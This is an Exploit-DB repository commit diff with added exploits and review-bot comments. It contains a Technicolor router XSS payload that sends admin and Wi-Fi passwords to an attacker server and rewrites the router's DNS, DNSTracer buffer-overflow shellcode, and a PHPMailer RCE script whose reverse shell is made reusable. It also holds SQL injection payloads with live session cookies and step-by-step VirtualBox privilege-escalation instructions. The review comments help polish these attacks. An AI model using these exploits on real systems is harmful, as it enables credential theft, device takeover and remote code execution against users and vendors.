DB: 2017-08-04

7 new exploits

DNSTracer 1.8.1 - Buffer Overflow
DNSTracer 1.8.1 - Buffer Overflow (PoC)
DNSTracer 1.9 - Buffer Overflow
VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation
VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation
Premium Servers List Tracker 1.0 - SQL Injection
EDUMOD Pro 1.3 - SQL Injection
Muviko 1.0 - 'q' Parameter SQL Injection
Technicolor TC7337 - SSID Persistent Cross-Site Scripting
Offensive Security 2017-08-04 05:01:28 +00:00
parent a600aa05cd
commit 16dd4b9d6d
9 changed files with 377 additions and 9 deletions

@ -5528,7 +5528,7 @@ id,file,description,date,author,platform,type,port
42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,windows,dos,0
42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow (PoC)",2017-06-05,FarazPajohan,linux,dos,0
42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
42135,platforms/android/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",android,dos,0
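Review bot: the 42115 line is a retitle rather than a new entry: the only change is appending "(PoC)" to "DNSTracer 1.8.1 - Buffer Overflow", which is why the same id appears twice in the rendered hunk. The new title follows the convention used for other crash-only entries (cf. 42112 above) and keeps it distinct from the new 42424 exploit for 1.9; the commit message lists the old and new titles as separate items, so its "7 new exploits" count still refers only to the seven genuinely new ids.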
@ -9169,6 +9169,9 @@ id,file,description,date,author,platform,type,port
42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
42424,platforms/linux/local/42424.py,"DNSTracer 1.9 - Buffer Overflow",2017-08-03,j0lama,linux,local,0
42425,platforms/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
42426,platforms/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
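Review bot: the three added local entries (42424, 42425, 42426) agree with their file headers on date (2017-08-03), author ("j0lama", "Google Security Research") and platform/type (linux/local, windows/local). One cross-reference to keep in sync: the 42424.py header cites exploits/42115 as the bug report and CVE-2017-9430, so the 42115 retitle in the hunk above must not break that link. The two VirtualBox entries describe source-only PoCs whose build artifacts are distributed as a separate zip, which this CSV has no column to express.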
@ -38219,3 +38222,7 @@ id,file,description,date,author,platform,type,port
42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
42416,platforms/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - SSID Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
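Review bot: 42427 is filed as platforms/hardware/webapps/42427.html, but the file added in this commit is JavaScript source with // comment headers, not an HTML document; a .js extension (or wrapping the code in a script element) is the usual archive convention and avoids the file being served as a broken page. The three Kaan KAMIS SQL injection entries and their 2017-08-02 dates match the advisory headers.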


@ -0,0 +1,90 @@
// Device : Technicolor TC7337
// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
// XSS through SSID : '><script src=//url.co></script> ( Exactly 32 bytes u_u )
// ^
// 5char domains are running | 'src' does not requires quotes , and passing the URL with ony '//'
// out, grab yours ! +---> it will cause the browser to make the request with the current protocol,
// which is HTTP , duh
// Below is the content of url.co/index.html
// index.html ( which is just a JavaScript actually, but we have to use the index to fit the 32 chars ) :
function get_passwords(attackers_server) {
// attackers_server = server to send the credentials
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// XSS to get Admin's login/passwd + Wifi passphrase
// from backup settings
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/backupsettings.cmd", false); // GET the Backup XML
xmlhttp.send();
var k = xmlhttp.responseText.indexOf("Admin") ; // Search for Admin's Login and Password
var y = xmlhttp.responseText.indexOf("KeyPassphrase") ; // Search for Wifi PassPhrase
// Add a img requesting the attacker website with the leaked passwords in the GET parameters
document.write('<img src="'+attackers_server+'?net='+ encodeURIComponent(xmlhttp.responseText.slice(k,k+100)+xmlhttp.responseText.slice(y,y+80))+'">');
}
function reboot_router() {
// XSS + CSRF reboot router
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// Why? Because It's fun to watch a XSS doing 'physical' stuff
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/resetrouter.html", false); // GET the page of the reset interface
xmlhttp.send();
var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rebootinfo.cgi?sessionKey="+sessionKey, false);
// Request the reboot page with the CSRF token
xmlhttp.send();
}
function dns_poisoning(attackers_dns) {
// attackers_dns = malicious DNS Server
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ holy shit my code is ugly as fuck , sorry world
// Alter the DNS Config of the Router
// changing the Primary and Secondary DNS to the attacker's one
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
xmlhttp.send();
var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1]; // Regex because the key is inside quotes
var i_wanip = xmlhttp.responseText.indexOf("wanip");
var wanip = xmlhttp.responseText.slice(i_wanip,i_wanip+30).match(/'([^']+)'/)[1];
var i_wansubnet = xmlhttp.responseText.indexOf("wansubnet");
var wansubnet = xmlhttp.responseText.slice(i_wansubnet,i_wansubnet+30).match(/'([^']+)'/)[1];
var i_wangatewayip = xmlhttp.responseText.indexOf("wangatewayip");
var wangatewayip = xmlhttp.responseText.slice(i_wangatewayip,i_wangatewayip+30).match(/'([^']+)'/)[1];
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rede-dnsv4.cgi?enblDhcpClnt=0&wanIpAddress="+wanip+"&wanIfName=wanbridge&wanSubnetMask="+wansubnet+"&wanIntfGateway="+wangatewayip+"&dnsPrimary="+attackers_dns+"&dnsSecondary="+attackers_dns+"&sessionKey="+sessionKey, false);
xmlhttp.send(); // Send the request to SAVE the Primary and Secondary DNS with the CSRF Token
//After saving we need to apply the settings. yeah, fuck logic --'
//Getting a brand NEW SessionKey
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/rede-dnsv4.html", false); // GET the DNS Config page
xmlhttp.send();
var w = xmlhttp.responseText.indexOf("Key") ; // Search for the SessionKey, some sort of CSRF Token
var sessionKey = xmlhttp.responseText.slice(w,w+20).match(/'([^']+)'/)[1] ; // Regex because the key is inside quotes
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET", "/wandnscfg.cmd?sessionKey="+sessionKey, false);
// GET the apply DNS page
xmlhttp.send();
}
//Choose your path !
//get_passwords("https://evil.domain/") ;
//reboot_router();
dns_poisoning("1.3.3.7")
// TimeLine
// ---------
// 08/07/2017 - First email sent to the vendor (no answer)
// 16/07/2017 - Second email sent to the vendor (no answer)
// 18/07/2017 - Third email sent to the vendor (no answer)
// 02/08/2017 - Full Disclosure
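Review bot: the header is missing the affected firmware version and any vendor reference, and the timeline records three unanswered emails followed by full disclosure, so a reader cannot tell whether a fixed build exists. On the logic side, the comments call the "sessionKey" "some sort of CSRF Token", and the code shows why that token is no mitigation for this bug: it is readable from the router's own origin, so it only stops cross-site requests, not script already injected into the page. The fix belongs at the injection point: HTML-encode the SSID when rendering wlscanresults.html (the 32-byte SSID limit constrains the payload, it does not prevent it). Style: `xmlhttp` is assigned without `var` throughout and leaks as a global, and `var w` / `var sessionKey` are declared twice inside dns_poisoning; harmless in ES5 but worth tidying.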

platforms/linux/local/42424.py (Executable file, 46 lines)

@ -0,0 +1,46 @@
# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php
# Proof of Concept
import os
from subprocess import call
def run():
try:
print "\nDNSTracer Stack-based Buffer Overflow"
print "Author: j0lama"
print "Tested with Dnstracer compile without buffer overflow protection"
nops = "\x90"*1006
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
filling = "A"*24
eip = "\x2f\xeb\xff\xbf"
#buf size = 1057
buf = nops + shellcode + filling + eip
call(["./dnstracer", buf])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "\nDnstracer not found!\n"
else:
print "\nError executing exploit\n"
raise
if __name__ == '__main__':
try:
run()
except Exception as e:
print "Something went wrong"
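Review bot: `os.errno` in the `except OSError` branch is not a documented attribute of the os module; it works on Python 2 only because os happens to import errno, and it was removed in Python 3.7. Use `import errno` and compare against `errno.ENOENT`. Documentation: "Tested with Dnstracer compile without buffer overflow protection" should state exactly which mitigations were disabled, because the hard-coded return address `"\x2f\xeb\xff\xbf"` and the 1006-byte NOP sled only hold for that particular Ubuntu 12.04 build; and "Google Dork: [if applicable]" is an unfilled template field that should be removed. The CVE and "Bug report" link correctly tie this 1.9 exploit back to the 42115 crash report for 1.8.1.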

@ -10,6 +10,8 @@
#
# @phackt_ul - https://phackt.com
#
# Find the last updated version here: https://raw.githubusercontent.com/phackt/pentest/master/exploits/rce_phpmailer_exim.py
#
# All credits go to Dawid Golunski (@dawid_golunski) - https://legalhackers.com
# and its research on PHP libraries vulns
#
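Review bot: the added "Find the last updated version here" link points at the raw file on the master branch, which will drift from this archived copy as the upstream script changes; pinning the URL to a commit hash would keep the two comparable. Minor: "its research" should read "his research".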
@ -75,10 +77,10 @@ def send_request(req):
try:
urllib2.urlopen(req)
except urllib2.HTTPError, e:
print "[!] Got HTTP error: [%d] when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % e.code
print "[!] Got HTTP error: [%d] when trying to reach " % e.code + req.get_full_url() + " - Check the URL!\n\n"
exit(3)
except urllib2.URLError, err:
print "[!] Got the '%s' error when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % err.reason
print "[!] Got the '%s' error when trying to reach " % str(err.reason) + req.get_full_url() + " - Check the URL!\n\n"
exit(4)
# Parse input args
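Review bot: the operator-precedence fix is correct: `%` binds tighter than `+`, so in the removed lines `% e.code` and `% err.reason` applied only to the trailing " - Check the URL!\n\n" literal, which has no conversion specifier, and raised TypeError ("not all arguments converted") instead of printing the message. The replacement lines format the leading literal, which holds the `%d` / `%s`, and wrapping `err.reason` in `str()` also covers the case where it is an exception object rather than a string. Remaining nits: `except urllib2.HTTPError, e:` is Python 2-only syntax, and `exit(3)` / `exit(4)` rely on the `site`-injected builtin; `sys.exit` is the portable form.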
@ -110,10 +112,10 @@ POST_MSG = [%s]
# Ask for mail library
print "[+] Choose your target / payload: "
print "\033[1;34m"
print """[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"""
print """ SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"""
print """ Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"""
print """[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"""
print "[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"
print " SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"
print " Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"
print "[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"
print "\033[0m"
try:
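Review bot: cosmetic only; the removed triple-quoted strings contained no newlines, so the printed menu is unchanged. Since the menu is wrapped in ANSI colour escapes ("\033[1;34m" ... "\033[0m"), consider emitting them only when stdout is a TTY so output redirected to a file stays clean.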
@ -129,7 +131,7 @@ if (target>2):
################################
# Payload
################################
cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'"
cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/%s/%s;nohup sh <&196 >&196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
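Review bot: replacing the hard-coded 192.168.1.19 / 1337 with args.ATTACKER_IP and args.ATTACKER_PORT makes the script reusable, but this hunk does not show where those two arguments are defined; they should be declared required in the argument parser, with the port typed as an int, since the values are interpolated unquoted into the bash command string. The usage/help text in the file header should also be updated to mention the two new parameters.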

platforms/php/webapps/42419.txt (Executable file, 20 lines)

@ -0,0 +1,20 @@
Exploit Title: Premium Servers List Tracker v1.0 SQL Injection
Date: 02.08.2017
Vendor Homepage: https://codecanyon.net/item/premium-servers-list-tracker/19796599?s_rank=270
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Premium phpServersList is an advanced servers management tool which allows users to track their own servers and visitors to find out great servers from all over the world. Our product is very flexible and, with a little imagination you can make your own unique servers list website.For example: If you want to make a certain type of servers list ( lets say, Counter Strike ) then you can setup from the admin panel so that users can only add Counter Strike Servers; Or if you want to have diversity in your website you can make it a top list, where everyone can add any type of server to the list.
Vulnerable Url: http://localhost/server/1[payload]
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://localhost/server/1 AND SLEEP(5)
---
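Review bot: the advisory gives no vendor notification timeline, fix status or CVE, and the two payload lines are redundant ("Vulnerable Url: .../server/1[payload]" and "Payload: .../server/1 AND SLEEP(5)" describe the same injection point); keep one. The sqlmap block shows the injection is in the numeric path segment after /server/, so the root cause is the server id being concatenated into the query; casting it to an integer or binding it as a query parameter is the fix.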

platforms/php/webapps/42420.txt (Executable file, 44 lines)

@ -0,0 +1,44 @@
Exploit Title: School Management System | EDUMOD Pro v1.3 SQL Injection
Date: 02.08.2017
Vendor Homepage: https://codecanyon.net/item/school-management-system-edumod-pro/19764430?s_rank=288
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
EDUMOD Pro is an advanced school management software based on web. It is developed with core PHP and mysql. You can manage all your school with a simple and understandable user interface. All modules available in software is under a start menu you can click to menu and go anywhere accross modules. There are various modules available for you and for your school in EDUMOD.
Vulnerable Url: http://localhost/students/search.php (POST Method)
Sqlmap Example : sqlmap -u "http://localhost/students/search.php" --cookie="_gat=1; _omappvp=true; _omappvs=true; _ga=GA1.2.810440502.1501701941; _gid=GA1.2.661879708.1501701941; PHPSESSID=i7gcjsi41rbm48ejn2a1ddgfti"
--data="Query=Test&action=Search"
---
Parameter: Query (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Query=Test%' AND 5466=5466 AND '%'='&action=Search
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
Payload: Query=Test%' AND (SELECT 7257 FROM(SELECT COUNT(*),CONCAT(0x717a7a7
671,(SELECT (ELT(7257=7257,1))),0x7171767871,FLOOR(RAND(0)*2))x FROM INFORMATION
_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='&action=Search
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: Query=Test%';SELECT SLEEP(5)#&action=Search
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: Query=Test%' AND SLEEP(5) AND '%'='&action=Search
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: Query=Test%' UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7671,0x4d715
07376585366416c53467453544e687853795747574a627351635357467676616366706e6355,0x71
71767871),NULL,NULL-- SXjD&action=Search
---
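Review bot: the sqlmap output was pasted with hard line wraps (the word "clause" is split into "cl" / "ause", and the hex payloads and the --data argument are broken across lines), so the payloads are not reproducible as shown; re-paste them unwrapped. The "Sqlmap Example" line also contains live session cookies (PHPSESSID and the _ga/_gid values), which should be redacted before publication. No timeline, fix status or CVE is given. The boolean payloads (`Test%' AND ... AND '%'='`) show that the Query POST parameter is interpolated into a LIKE '%...%' clause; a prepared statement with the wildcards appended to the bound value is the fix.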

platforms/php/webapps/42421.txt (Executable file, 31 lines)

@ -0,0 +1,31 @@
Exploit Title: Muviko - Video CMS v1.0 'q' Parameter SQL Injection
Date: 02.08.2017
Vendor Homepage: https://muvikoscript.com/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Muviko is a movie & video content management system.
Powerful, scalable and multi-purpose.
It has been built from the ground up to provide users with an excellent experience.
Uses can subscribe to watch your videos and earn you money.
You choose which of your videos require users to subscribe, and which are free.
You can also earn money from Ads.
Vulnerable Url: https://localhost/search.php?q=[payload]
Sqlmap Example : sqlmap.py -u "https://localhost/search.
php?q=star" --cookie="PHPSESSID=ipqrq203upp0kshdetjgn2hk12; _ga=GA1.2.1947531638
.1501703867; _gid=GA1.2.1749506565.1501703867; _gat=1"
---
Parameter: q (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: q=test' UNION ALL SELECT NULL,CONCAT(CONCAT('qqpzq','lHGBmBgXqPlXdk
uRCaimornRFWRUtWPKLWYLzQeK'),'qqvvq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL-- Gqvt
---
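Review bot: same issues as the EDUMOD advisory: the URL and the UNION payload are hard-wrapped mid-token ("search." / "php?q=star", "NU" / "LL"), so they are not usable as shown, and the example embeds a live PHPSESSID and _ga/_gid cookie values that should be redacted. No timeline, fix status or CVE is given. The 15-column UNION payload means the q GET parameter is concatenated into a SELECT of 15 columns; parameterising that query is the fix.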

@ -0,0 +1,73 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1257
VirtualBox: Windows Process DLL Signature Bypass EoP
Platform: VirtualBox v5.1.22 r115126 x64 (Tested on Windows 10)
Class: Elevation of Privilege
Summary:
The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process giving access to the VBoxDrv driver which can allow routes to EoP from a normal user.
Description:
NOTE: I dont know if you consider this an issue or not, however you fixed the last bypass I sent so its possible you still consider it a security boundary.
The ring 3 process hardening in VirtualBox adds three hooks to module loading to try and prevent untrusted code being loaded into the process, LdrLoadDll, NtCreateSection and a LDR DLL notification. Each will try and verify a DLL load and either reject the load with an error or kill the process is its not possible to prevent it from occurring. Looking at the hooks there a couple of issues which when combined together allow a user to inject an arbitrary DLL into a protected process.
The location checks are not very rigorous. As far as I can tell arbitrary files need to be owned by an admin/trustedinstaller but this check is waived if the file is in system32/WinSxS. However this doesnt take into account that there are some directories which can be written to inside system32 such as Tasks.
The code to enforce specific certificates doesnt seem to be enabled so at the very least combined with 1, you can load any validly signed file.
It might be considered that 2 isnt an issue as getting a signing cert could be a sufficient burden for a “malicious” attacker, so instead its worth considering what else the weak path checking allows you to do. The handling of DLL paths has some interesting behaviours, most interestingly theres the behaviour where if no file extension is added to the path then the loader will automatically append .DLL to it. This is actually implemented inside LdrLoadDll, this leads to our third problem:
3. If the path passed to LdrLoadDll doesnt have an extension then the protection code will signature check the extension less file but the loader will load the file with a .DLL extension. E.g. if trying to load \path\abc then \path\abc is signature checked but \path\abc.dll is loaded.
When combined with the ability to bypass the owner check we can drop an arbitrary valid signed file alongside our untrusted DLL and exploit this TOCTOU to load an arbitrary unsigned DLL. The following will show inside the VboxHardening.log when loading the file testdll.
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll: Owner is not trusted installer
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
2064.492c: supHardenedWinVerifyImageByHandle: -> 0 (\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll) WinVerifyTrust
2064.492c: supR3HardenedWinVerifyCacheInsert: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\testdll
2064.492c: supR3HardenedMonitor_LdrLoadDll: pName=c:\windows\system32\tasks\dummy\testdll (rcNtResolve=0xc0150008) *pfFlags=0x0 pwszSearchPath=0000000000002009:<flags> [calling]
This shows that it successfully passed the signature check inside the LdrLoadDll hook, however one of the other hooks should try and recheck the real testdll.dll file when it gets loaded instead. As the name of this file wont match the cached signature check it should still fail to complete loading. This is where the fourth issue comes in:
4. When doing the check inside supHardenedWinVerifyImageByHandle with WinVerifyTrust disabled (i.e. when in the DLL load notification hook) and the target file has no signature information an incorrect error code is returned which looks like success leading to the DLL being allowed to load and execute.
Specifically when supR3HardenedDllNotificationCallback is called it passes true to the fAvoidWinVerifyTrust parameter of supR3HardenedScreenImage. This first uses the RT code to check if the file is signed or not, if we use an unsigned file then this will return the error VERR_LDRVI_NOT_SIGNED (-22900). Later in supHardenedWinVerifyImageByLdrMod this error is checked and the function supHardNtViCheckIfNotSignedOk is called. This seems to result in the error coding changing from an error to VINF_LDRVI_NOT_SIGNED (22900) which is actually a success code. Normally this would be overridden again by the call to WinVerifyTrust but because thats disabled the final result of this process is the DLL notification callback thinks the signature check was successful even though it wasnt. This results in the DLL being allowed to complete loading.
For example the following is a snippet of the output when the bypass occurs.
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll: Owner is not trusted installer
2064.492c: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
2064.492c: supR3HardenedWinVerifyCacheScheduleImports: Import todo: #1 'user32.dll'.
2064.492c: supR3HardenedWinVerifyCacheScheduleImports: Import todo: #2 'advapi32.dll'.
2064.492c: supHardenedWinVerifyImageByHandle: -> 22900 (\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll)
2064.492c: supR3HardenedWinVerifyCacheInsert: \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll
2064.492c: supR3HardenedDllNotificationCallback: load 00007ff8a8600000 LB 0x00027000 c:\windows\system32\tasks\dummy\testdll.DLL [fFlags=0x0]
2064.492c: supR3HardenedScreenImage/LdrLoadDll: cache hit (Unknown Status 22900 (0x5974)) on \Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll [avoiding WinVerifyTrust]
2064.492c: Detected loader lock ownership: rc=Unknown Status 22900 (0x5974) '\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll'.
2064.492c: supR3HardenedWinVerifyCacheProcessWvtTodos: 22900 (was 22900) fWinVerifyTrust=0 for '\Device\HarddiskVolume4\Windows\System32\Tasks\dummy\TestDll.dll' [rescheduled]
This combination of issues results in being able to inject arbitrary executable code into a VirtualBox protected process and access the resources such as the kernel driver that this would provide.
Proof of Concept:
Ive provided a PoC DLL which will be loaded through abusing the VBox COM Client loading process in source form. Ive also provided a registry file which will need to be imported.
Prerequisites:
The DLL must be compiled in release mode for the architecture youre going to run VirtualBox on. Then follow these steps:
1) Create the directory c:\windows\system32\tasks\dummy on the command line using mkdir c:\windows\system32\tasks\dummy
2) Import the provided .reg file to setup the COM hijack using the command line reg import keys.reg
3) Copy a valid signed file (such as VirtualBox.exe) to the file c:\windows\system32\tasks\dummy\testdll.
4) Copy the compiled PoC dll to c:\windows\system32\tasks\dummy\testdll.dll.
5) Start a VM. Each process the DLL is injected into will show a message box. This will include the protected VirtualBox.exe process.
Expected Result:
Untrusted DLL loading should fail inside a protected process.
Observed Result:
DLL is loaded into the protected process.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42425.zip
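Review bot: the numbered issue list is broken: the paragraphs beginning "The location checks are not very rigorous" and "The code to enforce specific certificates doesnt seem to be enabled" are items 1 and 2 (the text later says "combined with 1" and "2 isnt an issue"), yet only items 3 and 4 carry numbers; restoring "1." and "2." makes the cross-references resolve. "Proof of Concept:" is used both as the description heading and as the download-link heading; rename the second. For defenders, the diagnostic in the log excerpt is the `supHardenedWinVerifyImageByHandle: -> 22900` line: an unsigned file should yield the error VERR_LDRVI_NOT_SIGNED (-22900), and the positive VINF_LDRVI_NOT_SIGNED (22900) being cached as a success is issue 4 of the write-up. The prerequisites need only a normal user because Tasks under system32 is user-writable, which is issue 1.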

@ -0,0 +1,55 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1296
VirtualBox: Windows Process DLL UNC Path Signature Bypass EoP
Platform: VirtualBox v5.1.22 r115126 x64 (Tested on Windows 10)
Class: Elevation of Privilege
Summary:
The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process giving access to the VBoxDrv driver which can allow routes to EoP from a normal user.
Description:
NOTE: I dont know if you consider this an issue or not, however you fixed the last bypass I sent so its possible you still consider it a security boundary.
This is a similar issue in impact to the one I reported in S0867394 but it uses a completely different mechanism. Once again we can use a current user COM registration to redirect the VBOX COM object to an arbitrary DLL path. However in this case rather than using MS signed code or abusing path behaviours in DLL library loading (and a bug in the hardening code) we'll instead abuse the way Windows handles image mapping from a kernel perspective.
On Windows mapped DLLs use an Image Section under the hood. This is a special type of file mapping where the parsing and relocating of the PE file is all handled by the kernel. To allow for sharing of image mappings (so ideally the kernel only needs to do the parsing and relocation once) the kernel memory manager ties the file object to an existing section object by using a unique section pointer set by the file system driver. The interesting thing about this is the section pointer doesn't necessarily ensure the file hasn't changed, just that the file system considered the file the "same". Therefore it's possible that opening a file and reading it returns a completely different PE file than the one you'll get if you then map that file as an image section.
If we can get a file mapped via one section pointer, then change the file underneath to be a different one we can exploit this. However on a default NTFS drive this isn't really possible due to things like sharing (outside of having admin privileges) so we need to use something different. For that we can use the SMB client file system. When you open a file via a UNC path any queries for the path return a MUP device path such as \Device\Mup\server\share\path\file.dll. When this is first mapped into memory the section pointer is used to refer to any file with that same path, however when opening the file the SMB client still needs to go to the server and receive the current data. Even with SMB supporting locking hopefully you can see that if you control the server as an admin then all bets are off with regards to returning the same data. In the worst case you could compile SAMBA with some custom code to do the attack (not that it would be needed). SMB also supports all the necessary file operations the hardening code checks for such as requesting the file Owner so we can pass all the checks with this. So to do the attack we can do the following:
1. Load our untrusted DLL from \\server\share\path\file.dll and map it into memory using something like LoadLibrary. This mapping needs to stay valid for the entire exploit to work.
2. Change the untrusted DLL file on the server to one which is a valid file for the hardening code and also has a owner set appropriately.
3. Add current user COM redirection to point VBOX class to the original UNC path.
4. Run VirtualBox. The hardening code will read the UNC path and find it's a valid file, however when the kernel maps the image section in NtMapViewOfSection it will find it's already got a mapped image loaded and will use that instead, the mapped image is of course the untrusted DLL, not the one the hardening code checked.
5. The untrusted DLL will be loaded into memory and executed.
